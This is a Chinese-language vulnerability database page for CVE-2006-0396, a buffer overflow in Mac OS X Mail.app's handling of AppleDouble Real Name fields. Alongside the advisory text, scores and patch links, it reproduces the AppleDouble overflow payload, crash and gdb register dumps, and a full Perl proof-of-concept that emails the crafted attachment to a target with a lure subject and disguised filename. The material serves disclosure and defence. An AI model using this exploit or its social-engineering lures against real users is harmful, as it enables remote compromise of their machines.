CVE-2006-0396
CVSS5.1
发布时间 :2006-03-14 06:02:00
修订时间 :2011-03-07 21:29:56
NMCOES    

[原文]Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment.


[CNNVD]Apple Mac OS X邮件消息附件远程缓冲区溢出漏洞(CNNVD-200603-268)

        Apple Mac OS X是苹果家族电脑所使用的操作系统。
        Apple Mac OS X的2006-001安全更新存在缓冲区溢出漏洞,攻击者可能利用此漏洞在机器上执行任意指令。
        在安装Apple的2006-001安全更新后,Mail.app中存在缓冲区溢出漏洞。攻击者可以发送包含有AppleDouble头信息的特制MIME封装Macintosh文件来触发这个漏洞。例如:
        "\x00\x05\x16\x07". # AppleDouble Magic Number
        "\x00\x02\x00\x00". # Version 2
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler
        "\x00\x03\x00\x00". # Number of entries (3)
        "\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info'
        "\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e
        "\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10
        "\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name'
        "\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48
        "\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245
        "\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork'"\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d
        "\x05\x3a\x00\x00". # Length of Resource fork is 0x053a
        "\x00\x00\x00\x00". # filler
        "\x00\x00\x00\x00". # filler
        "A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.
        ...
        如果Mail.app收件箱中收到了有上述首部的消息的话,用户就只能看到Real Name项所提供的名称的前11个字符,在这个例子中是"AAAAAAAAAAA...mov"。其他例子还可能包括"SuperTastey...mov"或"NakedChicks...mov"等。
        如果双击了附件文件,就会导致以下dump:
        
        Date/Time: 2006-03-04 10:35:32.472 -0500
        OS Version: 10.4.5 (Build 8H14)
        Report Version: 4
        Command: Mail
        Path: /Applications/Mail.app/Contents/MacOS/Mail
        Parent: WindowServer [64]
        Version: 2.0.7 (746.2)
        Build Version: 1
        Project Name: MailViewer
        Source Version: 7460200
        PID: 271
        Thread: 0
        Exception: EXC_BAD_ACCESS (0x0001)
        Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140
        在gdb可以看到有几处溢出:
        
        (gdb) bt
        #0 0x41424344 in ?? ()
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x31313131
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x41424344
        #1 0x41424344 in ?? ()
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x31313131
        warning: Previous frame identical to this frame (corrupt stack?)
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x31313139
        这样就控制了r0、pc、lr和一半的r31。
        
        (gdb) i r $r0 $pc $lr $r31
        r0 0x41424344 1094861636
        pc 0x41424344 1094861636
        lr 0x41424344 1094861636
        r31 0x18b3030 25899056
        成功利用这个漏洞的攻击者可以远程执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:apple:mac_os_x_server:10.4.5Apple Mac OS X Server 10.4.5
cpe:/o:apple:mac_os_x_server:10.4.1Apple Mac OS X Server 10.4.1
cpe:/o:apple:mac_os_x:10.4.2Apple Mac OS X 10.4.2
cpe:/o:apple:mac_os_x:10.4Apple Mac OS X 10.4
cpe:/o:apple:mac_os_x_server:10.4.3Apple Mac OS X Server 10.4.3
cpe:/o:apple:mac_os_x_server:10.4Apple Mac OS X Server 10.4
cpe:/o:apple:mac_os_x_server:10.4.2Apple Mac OS X Server 10.4.2
cpe:/o:apple:mac_os_x_server:10.4.4Apple Mac OS X Server 10.4.4
cpe:/o:apple:mac_os_x:10.4.3Apple Mac OS X 10.4.3
cpe:/o:apple:mac_os_x:10.4.1Apple Mac OS X 10.4.1
cpe:/o:apple:mac_os_x:10.4.5Apple Mac OS X 10.4.5
cpe:/o:apple:mac_os_x:10.4.4Apple Mac OS X 10.4.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0396
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0396
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-268
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/980084
(UNKNOWN)  CERT-VN  VU#980084
http://www.securityfocus.com/bid/17081
(PATCH)  BID  17081
http://securitytracker.com/id?1015762
(PATCH)  SECTRACK  1015762
http://secunia.com/advisories/19129
(VENDOR_ADVISORY)  SECUNIA  19129
http://www.vupen.com/english/advisories/2006/0949
(UNKNOWN)  VUPEN  ADV-2006-0949
http://www.securityfocus.com/archive/1/archive/1/427601/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060314 DMA[2006-0313a] - 'Apple OSX Mail.app RFC1740 Real Name Buffer Overflow'
http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt
(VENDOR_ADVISORY)  MISC  http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt
http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html
(UNKNOWN)  APPLE  APPLE-SA-2006-03-13
http://docs.info.apple.com/article.html?artnum=303453
(UNKNOWN)  CONFIRM  http://docs.info.apple.com/article.html?artnum=303453
http://xforce.iss.net/xforce/xfdb/25209
(UNKNOWN)  XF  macosx-mail-attachment-bo(25209)
http://www.osvdb.org/23872
(UNKNOWN)  OSVDB  23872

- 漏洞信息

Apple Mac OS X邮件消息附件远程缓冲区溢出漏洞
中危 缓冲区溢出
2006-03-14 00:00:00 2006-03-21 00:00:00
远程  
        Apple Mac OS X是苹果家族电脑所使用的操作系统。
        Apple Mac OS X的2006-001安全更新存在缓冲区溢出漏洞,攻击者可能利用此漏洞在机器上执行任意指令。
        在安装Apple的2006-001安全更新后,Mail.app中存在缓冲区溢出漏洞。攻击者可以发送包含有AppleDouble头信息的特制MIME封装Macintosh文件来触发这个漏洞。例如:
        "\x00\x05\x16\x07". # AppleDouble Magic Number
        "\x00\x02\x00\x00". # Version 2
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler
        "\x00\x03\x00\x00". # Number of entries (3)
        "\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info'
        "\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e
        "\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10
        "\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name'
        "\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48
        "\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245
        "\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork'"\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d
        "\x05\x3a\x00\x00". # Length of Resource fork is 0x053a
        "\x00\x00\x00\x00". # filler
        "\x00\x00\x00\x00". # filler
        "A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.
        ...
        如果Mail.app收件箱中收到了有上述首部的消息的话,用户就只能看到Real Name项所提供的名称的前11个字符,在这个例子中是"AAAAAAAAAAA...mov"。其他例子还可能包括"SuperTastey...mov"或"NakedChicks...mov"等。
        如果双击了附件文件,就会导致以下dump:
        
        Date/Time: 2006-03-04 10:35:32.472 -0500
        OS Version: 10.4.5 (Build 8H14)
        Report Version: 4
        Command: Mail
        Path: /Applications/Mail.app/Contents/MacOS/Mail
        Parent: WindowServer [64]
        Version: 2.0.7 (746.2)
        Build Version: 1
        Project Name: MailViewer
        Source Version: 7460200
        PID: 271
        Thread: 0
        Exception: EXC_BAD_ACCESS (0x0001)
        Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140
        在gdb可以看到有几处溢出:
        
        (gdb) bt
        #0 0x41424344 in ?? ()
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x31313131
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x41424344
        #1 0x41424344 in ?? ()
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x31313131
        warning: Previous frame identical to this frame (corrupt stack?)
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x41424344
        Cannot access memory at address 0x31313139
        这样就控制了r0、pc、lr和一半的r31。
        
        (gdb) i r $r0 $pc $lr $r31
        r0 0x41424344 1094861636
        pc 0x41424344 1094861636
        lr 0x41424344 1094861636
        r31 0x18b3030 25899056
        成功利用这个漏洞的攻击者可以远程执行任意指令。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Apple SecUpd2006-002Intel.dmg
        http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty1.pl/product=09965&cat=1&platform=osx&method=sa/SecUpd2006-002Intel.dmg
        Apple SecUpd2006-002Ti.dmg
        http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty1.pl/product=09964&cat=1&platform=osx&method=sa/SecUpd2006-002Ti.dmg

- 漏洞信息 (1583)

Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit (EDBID:1583)
osX remote
2006-03-13 Verified
25 Kevin Finisterre
N/A [点击下载]
#!/usr/bin/perl
#
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com 
#
# Mail.app Version 2.0.7 (746.2) on OSX 10.4.5 Build 8H14 + Security Update 2006-001 (PowerPC) v1.0
#
# RFC-1740 MIME-based Mac file buffer overflow
# 
# AppleSingle file header:
# [4 byte magic number][4 byte version number][16 bytes of filler][2 byte number of entries][Entry...]
# Entry descriptor for each Entry:
# [4 byte entry id][4 byte offset][4 byte length]
# Real Name entry id is 0x03, Finder Info is 0x09 and Resource Fork is 0x02
#
# If this exploit is not working clean out your ~/Library/Mail Downloads folder
#
# ./SuperTastey.pl mx.yourhost.com yourmac\@someplace.com
#
use IO::Socket;
use MIME::Base64;
$hostName = $ARGV[0];
$emailaddy = $ARGV[1];

$sock = IO::Socket::INET->new (Proto => "tcp", PeerAddr => $hostName, PeerPort => 25, Type => SOCK_STREAM);
$sock or die "no socket :$!\n"; 
print $sock "EHLO [192.168.1.7]\r\n" .
"MAIL FROM:<root>\r\n" .   # This needs to be valid for what ever server you are using. 
"RCPT TO:<$emailaddy>\r\n" .	      # Target machine goes email address here. 
"DATA\r\n" .
"Mime-Version: 1.0 (Apple Message framework v746.2)\r\n" .
"To: kfinisterre\@blah.com\r\n" .
"Message-Id: <1AE65A5B-6E3A-479B-8ECB-8BC4D959A69A\@blah.com\r\n" .
"Content-Type: multipart/mixed; boundary=Apple-Mail-3-188295813\r\n" .
"From: root <root>\r\n" .
"Subject: Dude you have to see this shit!\r\n" .
"Date: Mon, 6 Mar 2006 23:04:12 -0500\r\n" .
"X-Mailer: Apple Mail (2.746.2)\r\n" .
"\r\n" .
"\r\n" .
"--Apple-Mail-3-188295813\r\n" .
"Content-Type: multipart/appledouble;\r\n" .
"\tboundary=Apple-Mail-4-188295813\r\n" .
"Content-Disposition: attachment\r\n" .
"\r\n" .
"\r\n" .
"--Apple-Mail-4-188295813\r\n" .
"Content-Transfer-Encoding: base64\r\n" .
"Content-Type: application/applefile;\r\n" .
"\tname=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.mov\"\r\n" .
"Content-Disposition: attachment;\r\n" .
"\tfilename*1=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC.mov\r\n" .
"\r\n";

$retaddr = "\x41\x42\x43\x44";  # Shit the spec says printable ASCII!

$bufferz  = 

"\x00\x05\x16\x07".	# AppleDouble Magic Number
"\x00\x02\x00\x00".	# Version 2
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".	# 16 Bytes of <null> filler
"\x00\x03\x00\x00".	# Number of entries (3)
"\x00\x09\x00\x00".	# Entry ID 9 is for 'Finder Info'
"\x00\x3e\x00\x00".	# Start of Finder Info data is at file offset 0x3e
"\x00\x0a\x00\x00".	# Length of Finder Info is 0x0a or 10
"\x00\x03\x00\x00".	# Entry ID 3 is for 'Real Name'
"\x00\x48\x00\x00".	# Start of Real Name data is at file offset 0x48
"\x00\xf5\x00\x00".	# Length of Real Name is 0xf5 or 245
"\x00\x02\x00\x00".	# Entry ID 2 is for 'Resource Fork'
"\x01\x3d\x00\x00".	# Start of Resource Fork is at file offset 0x013d
"\x05\x3a\x00\x00".	# Length of Resource fork is 0x053a
"\x00\x00\x00\x00".	# <null> filler
"\x00\x00\x00\x00".	# <null> filler
"aa" x 109 . "0000" . "1111" .  "2222" . "$retaddr" x 1 . "3333" . "zzz.mov." . # remember this length is hard coded above. 
# Anything over 11 chars is here not seen by the user try Something like NakedChicks...mov 
# or SuperTastey...mov don't forget the trailing '.' both .mov and .jpg work well from a Visual standpoint
#
# No fscking clue what this is... it is stolen from MetaSploit. 
# I think its just a resource fork. 
"\x00\x01\x00\x00\x00\x05\x08\x00\x00\x04\x08\x00\x00\x00\x32\x00". 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x04\x04\x00\x00\x00\x25\x2f\x41\x70\x70\x6c\x69".
"\x63\x61\x74\x69\x6f\x6e\x73\x2f\x55\x74\x69\x6c\x69\x74\x69\x65".
"\x73\x2f\x54\x65\x72\x6d\x69\x6e\x61\x6c\x2e\x61\x70\x70\x00\xec".
"\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec".
"\xec\xec\xff\xec\xec\xec\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1".
"\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1".
"\xe1\xe1\xff\xe1\xe1\xe1\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6".
"\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6".
"\xe6\xe6\xff\xe6\xe6\xe6\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9".
"\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9".
"\xe9\xe9\xff\xe9\xe9\xe9\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec".
"\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec".
"\xec\xec\xff\xec\xec\xec\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef".
"\xef\xef\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef".
"\xef\xef\xff\xef\xef\xef\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3".
"\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3".
"\xf3\xf3\xff\xf3\xf3\xf3\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6".
"\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6".
"\xf6\xf6\xff\xf6\xf6\xf6\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8".
"\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8".
"\xf8\xf8\xff\xf8\xf8\xf8\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc".
"\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc".
"\xfc\xfc\xff\xfc\xfc\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00".
"\x00\x00\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00".
"\x00\x00\xa8\x00\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00".
"\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00".
"\x00\x00\x2a\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00".
"\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00".
"\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x05\x08\x00\x00\x04\x08\x00\x00\x00\x32\x00\x5f\xd0\xac\x12\xc2".
"\x00\x00\x00\x1c\x00\x32\x00\x00\x75\x73\x72\x6f\x00\x00\x00\x0a".
"\x00\x00\xff\xff\x00\x00\x00\x00\x01\x0d\x21\x7c";

print $sock encode_base64($bufferz) .
"\r\n" .
"--Apple-Mail-4-188295813\r\n" .
"Content-Transfer-Encoding: 8bit\r\n" .
"Content-Id: <1A628FD3-CED7-4C69-B5A6-5ABA7AEB2891\@local>\r\n" .
"Content-Type: video/quicktime;\r\n" .
"\tx-mac-type=0;\r\n" .
"\tx-unix-mode=0755;\r\n" .
"\tx-mac-creator=0;\r\n" .
"\tname=\"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD.mov\"\r\n" .
"Content-Disposition: attachment;\r\n" .
"\tfilename*0=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.mov;\r\n" .
#"\r\nFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF!\r\n" .
"\r\n" . "Z" x 90000 . "\r\n" .
"--Apple-Mail-4-188295813--\r\n" .
"\r\n" .
"--Apple-Mail-3-188295813--\r\n" .
".\r\n";
sleep 2;  # Allow enough time for the message to process before leaving 

# milw0rm.com [2006-03-13]
		

- 漏洞信息

23872
Apple Mac OS X Mail.app Attachment AppleDouble Header Processing Buffer Overflow
Remote / Network Access Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in Mac OS X Mail.app. The Mail.app facility fails to handle overly long Real Name entries resulting in a buffer overflow. With a specially crafted attachment in the AppleDouble format, an attacker can cause the execution of arbitrary code on a user's system resulting in a loss of integrity and/or availability.

- 时间线

2006-03-10 Unknow
2006-03-14 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, vendor has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Apple Mac OS X Mail Message Attachment Remote Buffer Overflow Vulnerability
Boundary Condition Error 17081
Yes No
2006-03-13 12:00:00 2006-03-15 12:15:00
Kevin Finisterre of DigitalMunition is credited with the discovery of this issue.

- 受影响的程序版本

Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.4.4
Apple Mac OS X Server 10.4.3
Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X 10.4.5
Apple Mac OS X 10.4.4
Apple Mac OS X 10.4.3
Apple Mac OS X 10.4.2
Apple Mac OS X 10.4.1
Apple Mac OS X 10.4

- 漏洞讨论

Mac OS X Mail is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.

An attacker can exploit this issue to execute arbitrary attacker-supplied code in the context of Mail. A successful exploit may facilitate a compromise of the underlying computer.

This issue is present in Apple Mail when 'Security Update 2006-001' is applied.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

The following AppleDouble header Perl code segment will reportedly aid in creating a file capable of triggering this issue by crashing the vulnerable application:

"\x00\x05\x16\x07". # AppleDouble Magic Number
"\x00\x02\x00\x00". # Version 2
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler
"\x00\x03\x00\x00". # Number of entries (3)
"\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info'
"\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e
"\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10
"\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name'
"\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48
"\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245
"\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork'
"\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d
"\x05\x3a\x00\x00". # Length of Resource fork is 0x053a
"\x00\x00\x00\x00". # <null> filler
"\x00\x00\x00\x00". # <null> filler
"A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.

An attachment with this AppleDouble header will reportedly appear with a filename of 'AAAAAAAAAAA...mov'.

A proof-of-concept Perl exploit designed to create and send email containing an attachment sufficient to crash Apple Mail is provided by Kevin Finisterre <kf_lists@digitalmunition.com>.

- 解决方案

The vendor has released Security Update 2006-002 addressing this issue. Please see the referenced vendor advisory for information on obtaining and applying the appropriate updates.


Apple Mac OS X Server 10.4.5

Apple Mac OS X 10.4.5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站